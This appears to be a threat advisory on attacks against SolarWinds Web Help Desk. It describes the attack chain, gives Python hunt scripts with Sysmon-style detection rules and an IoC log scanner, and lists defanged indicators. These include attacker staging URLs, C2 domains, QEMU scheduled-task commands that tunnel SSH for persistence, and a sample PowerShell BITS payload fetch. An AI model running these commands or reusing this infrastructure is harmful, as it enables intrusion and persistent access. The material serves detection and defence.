Summary
Threat actors are actively exploiting critical vulnerabilities in internet-exposed SolarWinds Web Help Desk (WHD) instances to achieve unauthenticated remote code execution. These intrusions follow a high-impact pattern in which a single unpatched application serves as the gateway for lateral movement and full domain compromise. Once inside, attackers deploy a mix of legitimate remote monitoring and management (RMM) tools and specialized command-and-control frameworks to maintain persistent access. While the specific vulnerabilities exploited have not been definitively identified, CVE-2025-40551 was recently added to CISA's Known Exploited Vulnerabilities database, and CVE-2025-40536 and CVE-2025-26399 were recently discussed by Microsoft and other vendors that have also observed active in-the-wild exploitation. Security teams are urged to patch all WHD versions prior to 12.8.7 HF1 immediately and to monitor for unauthorized installations of administrative tools.
Technical Analysis
The exploit chain begins when the vulnerable WHD service wrapper spawns a Java process that initiates PowerShell or cmd[.]exe to retrieve malicious payloads via BITS or msiexec. These payloads often include the Zoho ManageEngine RMM agent, which threat actors use to conduct hands-on-keyboard reconnaissance of Active Directory environments. In several instances, attackers utilized the file-hosting services Catbox and Supabase to stage malicious MSI installers while registering agents to anonymous Proton Mail accounts.
Persistence is frequently established through reverse SSH tunnels and the creation of scheduled tasks designed to launch QEMU virtual machines, effectively masking malicious traffic within a virtualized SYSTEM context. To further evade detection, threat actors perform DLL sideloading by abusing wab.exe to load a malicious sspicli.dll, facilitating direct access to LSASS memory and credential theft. Lateral movement follows textbook patterns, starting with domain computer enumeration and escalating to DCSync attacks that request password data directly from domain controllers.
Defenders have also observed the deployment of Velociraptor, a legitimate forensics tool, repurposed as a command-and-control framework through customized configuration files pointing to Cloudflare Workers.
Remediation requires the immediate isolation of compromised hosts, rotation of high-privilege service credentials, and the thorough removal of unauthorized RMM artifacts like TOOLSIQ.EXE.
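The behaviours described in the three paragraphs above (the WHD Java process spawning a shell that fetches a payload via BITS or msiexec, a scheduled QEMU virtual machine with guest SSH forwarded onto a host port, and wab.exe sideloading a planted sspicli.dll) can be turned into host-level hunt logic. The following is an added example and is not code from the advisory or from Huntress: it runs three rules over constructed, Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records. The field names follow Sysmon's schema; matching "WebHelpDesk" in the parent's path is an assumption about the install location, not a documented binary name, and all sample events are constructed.

```python
import re

# Child shells the advisory says the WHD Java process launches.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Download/install utilities named in the advisory (BITS, msiexec).
FETCHERS = re.compile(r"bitsadmin|Start-BitsTransfer|msiexec", re.I)
# QEMU guest with a host port forwarded onto the guest's SSH port (port 22).
QEMU_SSH_FWD = re.compile(r"hostfwd=tcp::\d+-:22\b", re.I)
SYSTEM32 = "c:\\windows\\system32\\"


def _base(path):
    """File name component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return (rule_name, evidence) tuples for every event that matches a rule."""
    findings = []
    for e in events:
        img = _base(e.get("Image", ""))
        cmd = e.get("CommandLine", "")
        if e.get("EventID") == 1:  # Sysmon process creation
            parent = _base(e.get("ParentImage", ""))
            # Rule 1: a shell spawned by WHD's Java process that pulls a payload
            # via BITS or msiexec. The 'webhelpdesk' path check is an assumption.
            if (img in SHELLS and parent == "java.exe"
                    and "webhelpdesk" in e.get("ParentImage", "").lower()
                    and FETCHERS.search(cmd)):
                findings.append(("whd_java_shell_download", cmd))
            # Rule 2: QEMU started with guest SSH exposed on the host, the
            # pattern of the TPMProfiler scheduled task in the IoC list.
            if img.startswith("qemu-system") and QEMU_SSH_FWD.search(cmd):
                findings.append(("qemu_ssh_port_forward", cmd))
        elif e.get("EventID") == 7:  # Sysmon image load
            loaded = e.get("ImageLoaded", "")
            # Rule 3: wab.exe loading sspicli.dll from anywhere but System32.
            if (img == "wab.exe" and _base(loaded) == "sspicli.dll"
                    and not loaded.lower().startswith(SYSTEM32)):
                findings.append(("wab_sspicli_sideload", loaded))
    return findings


# Constructed sample telemetry for illustration; not real log data.
SAMPLE_EVENTS = [
    # WHD's bundled Java spawning PowerShell to fetch an MSI over BITS (hit).
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "CommandLine": r"powershell -nop -c Start-BitsTransfer -Source https://example.invalid/a.msi -Destination C:\ProgramData\a.msi"},
    # Ordinary admin PowerShell started from Explorer (no hit).
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Service"},
    # Scheduled-task-style QEMU launch forwarding host port 22022 to guest SSH (hit).
    {"EventID": 1,
     "Image": r"C:\Users\jdoe\tmp\qemu-system-x86_64.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Users\jdoe\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"},
    # wab.exe loading the genuine sspicli.dll from System32 (no hit).
    {"EventID": 7, "Image": r"C:\Program Files\Common Files\System\wab.exe",
     "ImageLoaded": r"C:\Windows\System32\sspicli.dll"},
    # wab.exe copied next to a planted sspicli.dll (hit).
    {"EventID": 7, "Image": r"C:\Users\jdoe\tmp\wab.exe",
     "ImageLoaded": r"C:\Users\jdoe\tmp\sspicli.dll"},
]

if __name__ == "__main__":
    for rule, evidence in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Rule 3 keys on the load path rather than on the presence of wab.exe, because wab.exe is a legitimate Windows binary; a copy of it running from a user-writable directory alongside its loaded DLL is the signal. Rule 2 deliberately does not depend on the task name (TPMProfiler), since that is trivially changed, and instead matches the port-forward argument the advisory's two task commands share.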
Indicators of Compromise
Huntress provided the following Indicators of Compromise for review and ingestion related to recent SolarWinds exploitation.
Indicator | Description
https[:]//files.catbox[.]moe/tmp9fc.msi (SHA256: 897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189) | Zoho Meetings Installer
https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi (SHA256:) | Velociraptor Installer
https[:]//auth.qgtxtebl.workers[.]dev/ | Velociraptor Server URL
https[:]//github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi | Cloudflared Installer
https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/code.txt; local path C:\ProgramData\Microsoft\code.exe (SHA256: 34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4) | Portable version of VSCode
https[:]//62c4cbb992274c32922cfbb49d623bd1.us-central1.gcp.cloud.es[.]io | Elasticsearch URL
esmahyft@proton[.]me | Zoho Assist Account Email
v2-api.mooo[.]com | Velociraptor Failover Domain
client.config[.]yaml | Velociraptor Config File
Task Path: C:\Windows\System32\Tasks\TPMProfiler; Command: C:\Users\[user]\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22 | Scheduled Task (persistence)
Task Path: C:\Windows\System32\Tasks\TPMProfiler; Command: C:\Users\[user]\local\qemu-system-x86_64 -m 1G -smp 1 -hda bisrv.dll -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::32567-:22 | Scheduled Task (persistence)
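The network and file indicators above are published defanged (`[.]`, `[:]`), so they must be normalised before they can be compared against proxy, DNS or EDR telemetry. The following is an added example, not code from the advisory or from Huntress: it refangs the URL, e-mail and domain indicators from the table, reduces each to its host, and scans constructed log lines for those hosts and for the two SHA256 hashes the table lists. The log-line format is an assumption for illustration and every sample line is constructed.

```python
import re

# Defanged indicators copied from the table above, keyed to their descriptions.
IOCS = {
    "https[:]//files.catbox[.]moe/tmp9fc.msi": "Zoho Meetings Installer",
    "https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi": "Velociraptor Installer",
    "https[:]//auth.qgtxtebl.workers[.]dev/": "Velociraptor Server URL",
    "v2-api.mooo[.]com": "Velociraptor Failover Domain",
    "esmahyft@proton[.]me": "Zoho Assist Account Email",
}
HASHES = {
    "897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189": "Zoho Meetings Installer",
    "34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4": "Portable version of VSCode",
}


def refang(ioc):
    """Undo common defanging ([.] [:] hxxp) so the indicator can be compared to logs."""
    s = ioc.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s, flags=re.I)


def host_of(ioc):
    """Host part of a URL, e-mail address or bare domain indicator, lower-cased."""
    s = refang(ioc)
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/]+)", s, re.I)
    if m:
        return m.group(1).lower()
    if "@" in s:
        return s.split("@", 1)[1].lower()
    return s.lower()


HOST_INDEX = {host_of(i): d for i, d in IOCS.items()}
DOMAIN_TOKEN = re.compile(r"\b[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\b")
SHA256_TOKEN = re.compile(r"\b[0-9a-fA-F]{64}\b")


def scan(lines):
    """Return (description, line) for each log line mentioning a known host or hash."""
    hits = []
    for ln in lines:
        for h in SHA256_TOKEN.findall(ln):
            if h.lower() in HASHES:
                hits.append((HASHES[h.lower()], ln))
                break
        else:  # no hash hit on this line; fall back to host matching
            for tok in DOMAIN_TOKEN.findall(ln):
                if tok.lower() in HOST_INDEX:
                    hits.append((HOST_INDEX[tok.lower()], ln))
                    break
    return hits


# Constructed sample log lines; the format is invented for this example.
SAMPLE_LOGS = [
    "2025-01-01T10:00:00Z proxy host=srv01 GET https://files.catbox.moe/tmp9fc.msi 200",
    "2025-01-01T10:00:05Z dns host=srv01 query=auth.qgtxtebl.workers.dev type=A",
    "2025-01-01T10:00:07Z dns host=srv01 query=v2-api.mooo.com type=A",
    "2025-01-01T10:01:00Z edr host=srv01 filecreate C:\\ProgramData\\Microsoft\\code.exe "
    "sha256=34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4",
    "2025-01-01T10:02:00Z proxy host=ws12 GET https://www.example.com/ 200",
]

if __name__ == "__main__":
    for desc, line in scan(SAMPLE_LOGS):
        print(f"[{desc}] {line}")
```

Note that the e-mail indicator reduces to the shared domain proton.me, so a hit on it alone is weak evidence and should be weighted accordingly; the Supabase and Cloudflare Workers hosts, by contrast, carry attacker-specific subdomains and are high-confidence matches.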